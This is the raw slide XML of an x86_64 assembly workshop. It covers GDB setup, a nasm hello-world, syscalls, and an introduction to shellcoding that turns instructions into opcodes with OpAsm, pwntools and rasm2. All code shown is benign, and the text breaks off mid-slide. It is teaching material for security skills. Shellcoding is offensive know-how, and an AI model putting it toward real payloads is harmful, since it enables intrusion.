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6858000" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Lustria"/>
      <p:regular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42D928-1DF2-4F6E-B5C9-6E53AD981C50}">
  <a:tblStyle styleId="{7E42D928-1DF2-4F6E-B5C9-6E53AD981C50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fill>
          <a:solidFill>
            <a:srgbClr val="E7CECB"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1H>
    <a:band2H>
      <a:tcTxStyle/>
    </a:band2H>
    <a:band1V>
      <a:tcTxStyle/>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="E7CECB"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1V>
    <a:band2V>
      <a:tcTxStyle/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Lustria-regular.fntdata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c26b400b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1c26b400b_2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1c26b400b_2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1c26b400b_2_2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c26b400b_2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1c26b400b_2_4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1c26b400b_2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21c26b400b_2_5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c26b400b_2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21c26b400b_2_5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1c26b400b_2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21c26b400b_2_5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1c26b400b_2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1c26b400b_2_7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f477916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1f4779168b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f4951ab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1f4951ab4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f477916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1f4779168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f4779168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1f4779168b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f4779168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1f4779168b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f4779168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1f4779168b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f47e40d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f47e40d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1c26b400b_2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21c26b400b_2_8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f47e40d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1f47e40dc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f47e40dc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g1f47e40dcd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f47e40d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1f47e40dcd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1c26b400b_2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21c26b400b_2_1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f47e40dc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g1f47e40dcd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f47e40dc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1f47e40dcd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f4951ab4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g1f4951ab4c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f4951ab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1f4951ab4c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c26b400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1c26b400b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028020" y="1769541"/>
            <a:ext cx="7080026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5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028020" y="3598339"/>
            <a:ext cx="7080026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ctr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ctr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ctr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ctr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SD-panoPhotoInset.png" id="72" name="Google Shape;7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3995" y="540085"/>
            <a:ext cx="7656010" cy="38343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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685354" y="4565255"/>
            <a:ext cx="7766495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2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926217" y="695010"/>
            <a:ext cx="7285600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685346" y="5108728"/>
            <a:ext cx="776532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685346" y="608437"/>
            <a:ext cx="776532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3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685346" y="4295180"/>
            <a:ext cx="7765322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1084659" y="609600"/>
            <a:ext cx="6977064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3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1290484" y="3610033"/>
            <a:ext cx="6564224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685346" y="4304353"/>
            <a:ext cx="7765322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ustria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA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ustria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA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685346" y="2126943"/>
            <a:ext cx="7765322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3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685339" y="4650556"/>
            <a:ext cx="776414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685346" y="1885950"/>
            <a:ext cx="2475738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685346" y="2571750"/>
            <a:ext cx="2475738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3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3335033" y="1885950"/>
            <a:ext cx="2475738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4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331076" y="2571750"/>
            <a:ext cx="2475738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5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5974929" y="1885950"/>
            <a:ext cx="2475738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6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5974929" y="2571750"/>
            <a:ext cx="2475738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SD-3colPhotoInset.png" id="112" name="Google Shape;11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9239" y="1826045"/>
            <a:ext cx="2529046" cy="18335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SD-3colPhotoInset.png" id="113" name="Google Shape;11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93813" y="1826045"/>
            <a:ext cx="2529046" cy="18335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SD-3colPhotoInset.png" id="114" name="Google Shape;11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21715" y="1826045"/>
            <a:ext cx="2529046" cy="183355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685346" y="3904106"/>
            <a:ext cx="2475738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7" name="Google Shape;117;p16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763577" y="1938918"/>
            <a:ext cx="2319276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3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="4480369"/>
            <a:ext cx="2475738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4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3332091" y="3904106"/>
            <a:ext cx="2475738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0" name="Google Shape;120;p16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="5" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409307" y="1939094"/>
            <a:ext cx="2319276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6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331075" y="4480368"/>
            <a:ext cx="2476753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7" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975023" y="3904106"/>
            <a:ext cx="2475738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3" name="Google Shape;123;p16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="8" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6056774" y="1934432"/>
            <a:ext cx="2319276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9" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5974929" y="4480366"/>
            <a:ext cx="2475738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 rot="5400000">
            <a:off x="2538632" y="-120836"/>
            <a:ext cx="4058751" cy="776532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5003184" y="2343718"/>
            <a:ext cx="5181601" cy="171336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1063373" y="231574"/>
            <a:ext cx="5181601" cy="59376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971551" y="1761068"/>
            <a:ext cx="7192913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971551" y="3589879"/>
            <a:ext cx="7192913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85347" y="1732449"/>
            <a:ext cx="3795373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52169" y="1732450"/>
            <a:ext cx="3798499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SD-compPhotoInset.png"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345" y="1770323"/>
            <a:ext cx="3787423" cy="41129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SD-compPhotoInset.png" id="38" name="Google Shape;3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63245" y="1770323"/>
            <a:ext cx="3787423" cy="411295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754404" y="1835254"/>
            <a:ext cx="3657258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754404" y="2380138"/>
            <a:ext cx="3657258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0861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99719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083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819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8193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721225" y="1835255"/>
            <a:ext cx="3671498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721225" y="2380138"/>
            <a:ext cx="3671498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0861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99719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083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819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8193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685347" y="609600"/>
            <a:ext cx="2780167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2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641725" y="609600"/>
            <a:ext cx="4808943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685347" y="2431518"/>
            <a:ext cx="2780167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SD-vertPhotoInset.png" id="64" name="Google Shape;6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44987" y="609923"/>
            <a:ext cx="3428146" cy="520547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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685347" y="609923"/>
            <a:ext cx="3924676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3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4976728" y="743989"/>
            <a:ext cx="3165375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685347" y="2439261"/>
            <a:ext cx="3924676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3challs.com/syscalls/?arch=x86_64" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://filippo.io/linux-syscall-table/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64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asciinema.org/a/0hg3s1jmqiooxyn4og9q4pu50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asciinema.org/a/2asv7socak695q2ozdzus81yd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asciinema.org/a/32t84sqoc03lzgpm39jgv7jqb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br>
              <a:rPr b="0" i="0" lang="fr-CA" sz="324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CA" sz="324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0x01 Tooling and environment setup</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="fr-CA" sz="36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36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System requirement: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Linux system that support x86_64 instructions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Software requirement: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GDB configuration file ~/.gdbinit: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46" name="Google Shape;146;p19"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="790832" y="26113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537625"/>
              </a:tblGrid>
              <a:tr h="33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sudo apt install nasm gdb</a:t>
                      </a:r>
                      <a:endParaRPr b="0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7" name="Google Shape;147;p19"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="790832" y="39418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537625"/>
              </a:tblGrid>
              <a:tr h="33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r>
                        <a:rPr b="0" lang="fr-CA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disassembly-flavor intel</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 asm</a:t>
                      </a:r>
                      <a:endParaRPr b="0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 regs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define hook-stop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x/20xg $rsp</a:t>
                      </a:r>
                      <a:endParaRPr b="0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</a:t>
                      </a:r>
                      <a:endParaRPr b="0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0x02 Analyzing « Hello World »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565896" y="1810709"/>
            <a:ext cx="8227995" cy="414524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Keep in mind that these registers also exist but we are not going to cover them during this workshop.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cs point to the code segment (16 bit)</a:t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MMX instructions are part of the SSE* and AVX instruction set</a:t>
            </a:r>
            <a:endParaRPr sz="20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16" name="Google Shape;216;p28"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="565894" y="12360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758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cs, ss, ds,</a:t>
                      </a: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es, fs, gs</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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MM*, XMM*, YMM*, … </a:t>
                      </a:r>
                      <a:endParaRPr b="0"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685346" y="0"/>
            <a:ext cx="84588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0x02 Analyzing « Hello World »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685345" y="840260"/>
            <a:ext cx="8228100" cy="601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23" name="Google Shape;223;p29"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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758450"/>
              </a:tblGrid>
              <a:tr h="37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section .data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hello db "hello world!", 0x0a, 0x00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hello_len equ $ - hello</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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4" name="Google Shape;224;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="1810709"/>
            <a:ext cx="8228100" cy="4928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1" i="0" lang="fr-CA" sz="15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equ</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="fr-CA" sz="15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CA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fr-CA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reserved keyword to define a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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CA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constant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1" i="0" lang="fr-CA" sz="15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i="0" lang="fr-CA" sz="15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points to the current assembly location</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="15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15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15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15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15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54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1" lang="fr-CA" sz="15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equ $ - hello → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="15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(current address) - (Address of hello) = size of hello.</a:t>
            </a:r>
            <a:endParaRPr sz="15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0x02 Analyzing « Hello World »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574134" y="840260"/>
            <a:ext cx="8227995" cy="492784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nasm also allows you to declare uninitialized data sections.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buffer: 	resb 64		reserve 64 bytes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word:		rebw 1			reserve a word (16 b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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its)</a:t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32" name="Google Shape;232;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="17347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807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  <a:r>
                        <a:rPr b="0" lang="fr-CA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buffer[256];</a:t>
                      </a:r>
                      <a:endParaRPr b="0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Pseudo_Instructions.png"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25" y="3359894"/>
            <a:ext cx="3392675" cy="178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0x02 Analyzing « Hello World »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40" name="Google Shape;240;p31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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70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rax, 1              move 1 into rax register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rdi, 1              move</a:t>
                      </a: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1 into rdi register</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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rsi, hello          move the memory address of hello into rsi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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rdx, hello_len      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="15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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="15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the value located at hello_len into rdx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="15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syscall                 execute</a:t>
                      </a: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the defined syscall (sys_write)</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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rax, 60             mov 60 into rax</a:t>
                      </a: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register (sys_exit)</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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syscall                 execute the defined syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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section .data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hello db "hello world!", 0x0a, 0x00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hello_len equ $ - hello</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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1" name="Google Shape;241;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="4462127"/>
            <a:ext cx="8227995" cy="227642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565896" y="4374291"/>
            <a:ext cx="8227995" cy="23642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1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syscall</a:t>
            </a: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is used to request a service from the kernel.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The action is defined by the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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register</a:t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0x03 Introduction to syscall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49" name="Google Shape;249;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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70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rax    syscall       rdi    rsi    rdx     r10      r8       r9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      sys_read      fd</a:t>
                      </a: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buf    count</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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     sys_write     fd     buf    count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328    pwritev2      fd</a:t>
                      </a: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vec    vlen    pos_l    pos_h    flags</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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0" name="Google Shape;250;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="4462127"/>
            <a:ext cx="8227995" cy="227642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565895" y="2732095"/>
            <a:ext cx="8227995" cy="23642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52" name="Google Shape;252;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685342" y="28199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70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rax, 1              move 1 into rax register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rdi, 1              move</a:t>
                      </a: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1 into rdi register</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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rsi, hello          move the memory address of hello into rsi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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rdx, hello_len      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="15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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="15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the value located at hello_len into rdx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="15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syscall                 execute</a:t>
                      </a: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the defined syscall (sys_write)</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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syscall_table.png"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350" y="4462137"/>
            <a:ext cx="7700774" cy="1157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685346" y="0"/>
            <a:ext cx="84588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0x03 Introduction to syscall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685345" y="840260"/>
            <a:ext cx="8228100" cy="601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457996" y="4199694"/>
            <a:ext cx="8228100" cy="2276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565895" y="2732095"/>
            <a:ext cx="8228100" cy="2364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565900" y="1089333"/>
            <a:ext cx="8228100" cy="5223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3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Where to find Syscall Numbers:</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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spcBef>
                <a:spcPts val="12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nsolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA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/usr/include/asm/unistd_64.h</a:t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spcBef>
                <a:spcPts val="124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Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9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https://w3challs.com/syscalls/?arch=x86_64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spcBef>
                <a:spcPts val="124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Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9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https://filippo.io/linux-syscall-table/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spcBef>
                <a:spcPts val="124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Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9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http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/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0x03 Introduction to syscall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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr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69" name="Google Shape;269;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685343" y="12075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70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nasm</a:t>
                      </a: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–felf64 hello.asm –o hello.o</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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ld hello.o –o hello</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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gdb –tui ./hello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(gdb)</a:t>
                      </a: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 _start</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="16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(gdb) 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(gdb) stepi</a:t>
                      </a:r>
                      <a:endParaRPr b="0"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0" name="Google Shape;270;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="4462127"/>
            <a:ext cx="8227995" cy="227642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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565895" y="2732095"/>
            <a:ext cx="8227995" cy="23642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565896" y="1810709"/>
            <a:ext cx="8227995" cy="492784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24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24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24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Live demo analyzing the « Hello World » sample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0x03 Introduction to syscall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565896" y="4462127"/>
            <a:ext cx="8227995" cy="227642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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565895" y="2732095"/>
            <a:ext cx="8227995" cy="23642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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565895" y="1654190"/>
            <a:ext cx="8227995" cy="492784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Exercise:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="124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Read user input and print it to the screen.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11500" lvl="0" marL="36900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="124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24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15 minutes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0x03 Introduction to syscall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36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565896" y="4462127"/>
            <a:ext cx="8227995" cy="227642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>
            <a:off x="565895" y="2732095"/>
            <a:ext cx="8227995" cy="23642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90" name="Google Shape;290;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="970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70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BITS 64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 _start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section .text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_start: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mov rax, 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mov rdi, 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mov rsi, hello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mov rdx, 256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syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="14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mov rdx, rax</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="14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mov rax, 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mov rdi, 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mov rsi, hello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syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="14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mov rax, 60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syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="14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section .data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hello: resb 256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0x03 Introduction to syscall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565896" y="4462127"/>
            <a:ext cx="8227995" cy="227642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565895" y="2732095"/>
            <a:ext cx="8227995" cy="23642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99" name="Google Shape;299;p37"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="970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70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_start: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mov rax, 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mov rdi, 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mov rsi, hello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mov rdx, 256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syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="14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fr-CA" sz="1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rdx, rax</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="14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mov rax, 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mov rdi, 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mov rsi, hello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syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="14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mov rax, 60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syscall</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="14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section .data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fr-CA" sz="1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hello: resb 256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0" name="Google Shape;300;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565895" y="3068216"/>
            <a:ext cx="8227995" cy="492784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24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24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rtl="0" algn="l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1" lang="fr-CA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syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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’s result is returned in the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr-CA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fr-CA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register.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-11499" lvl="0" marL="36899" rtl="0" algn="l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 this case the length of the input read is set in RAX.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0x02 Analyzing « Hello World »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ctr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4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Ready to analyze and write assembly?</a:t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0x04 Introduction to shellcoding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99" lvl="0" marL="368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>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>We now have the basic knowledge necessary to write an assembly program. Now let’s use this knowledge to write shellcode.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-11499" lvl="0" marL="36899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>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>One question remains…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4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What is shellcode?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="4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0x04 Introduction to shellcoding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24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fr-CA" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Short answer shellcode is assembly.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fr-CA" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>The processor does not understand assembly instructions. Assembly is human-readable language.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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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0x04 Introduction to shellcoding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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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opcode</a:t>
            </a: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is a set of hexadecimal values between 0x00 and 0xff (inclusive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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/>
          </a:p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19" name="Google Shape;319;p40"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="21772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678375"/>
              </a:tblGrid>
              <a:tr h="37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eax, 1</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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20" name="Google Shape;320;p40"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="27596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67837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b8 01 00 00 00</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="fr-CA" sz="1900">
                          <a:solidFill>
                            <a:schemeClr val="lt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 </a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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685346" y="0"/>
            <a:ext cx="84588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0x04 Introduction to shellcoding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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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How to obtain opcodes? - Method #1 - OpAsm</a:t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27" name="Google Shape;327;p41"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="1767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678375"/>
              </a:tblGrid>
              <a:tr h="238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python OpAsm.1.3.py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OpAsm Tools v1.3 / Mr.Un1k0d3r RingZer0 Team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Usage: OpAsm.1.3.py [32/64] [opcode/asm] [data] [optional]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32/64 choose between 32 or 64 bits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opcode/asm choose between asm to opcode or opcode to asm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data your opcode/asm code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usable-shellcode convert asm to opcode and format the output as usable shellcode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Note*** You can specified multiple asm line by using ";" as line delimiter</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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28" name="Google Shape;328;p41"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="44339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678375"/>
              </a:tblGrid>
              <a:tr h="2066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python OpAsm.1.3.py 64 asm "mov rax, 1"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OpAsm Tools v1.3 / Mr.Un1k0d3r RingZer0 Team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ASSEMBLY OUTPUT _____________________________________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0:   b8 01 00 00 00          mov    eax,0x1</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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0x04 Introduction to shellcoding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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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How to obtain opcodes? - Method #2 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pwntools</a:t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35" name="Google Shape;335;p42"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="1767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678375"/>
              </a:tblGrid>
              <a:tr h="238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lang="fr-CA" sz="1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from pwn import *</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1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sc = '''mov rax, 1'''</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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lang="fr-CA" sz="1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asm(sc, os='linux', arch='x86_64')</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1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'H\xc7\xc0\x01\x00\x00\x00'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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lang="fr-CA" sz="1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asm(sc, os='linux', arch='x86_64').encode('hex')</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1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'48c7c001000000'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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lang="fr-CA" sz="1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print disasm('48c7c001000000'.decode('hex'), os='linux', arch='x86_64')</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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lang="fr-CA" sz="1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0:   48 c7 c0 01 00 00 00	 mov	rax,0x1</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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lang="fr-CA" sz="1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</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685346" y="0"/>
            <a:ext cx="84588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0x04 Introduction to shellcoding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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685345" y="840260"/>
            <a:ext cx="8228100" cy="601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How to obtain opcodes? - Method #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA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fr-CA">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>radare2 (rasm2)</a:t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42" name="Google Shape;342;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685344" y="1767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678375"/>
              </a:tblGrid>
              <a:tr h="179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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1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rasm2 -a x86 'mov rax, 1'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1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48c7c001000000</a:t>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="0" sz="1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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="fr-CA" sz="1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rasm2 -a x86 -C 'mov rax, 1'</a:t>
                      </a:r>
